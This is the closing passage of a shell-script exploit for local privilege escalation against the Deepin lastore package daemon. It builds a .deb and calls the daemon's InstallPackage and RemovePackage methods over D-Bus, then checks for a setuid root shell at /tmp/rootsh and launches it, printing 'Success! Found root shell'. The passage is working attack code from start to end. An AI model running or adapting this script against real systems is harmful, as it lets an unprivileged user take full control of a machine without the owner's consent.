dpkg-deb --build "${BASE}${UUID}"
echo Installing package...
dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.InstallPackage string:"${UUID}" string:"${BASE}${UUID}.deb"
sleep 10
echo Removing package...
dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.RemovePackage string:" " string:"${UUID}"
rm -rf "${BASE}${UUID}" "${BASE}${UUID}.deb"
if [ -f /tmp/rootsh ]
then
  echo "Success! Found root shell: /tmp/rootsh"
  /tmp/rootsh
else
  echo "Exploit failed! Check /var/log/lastore/daemon.log"
fi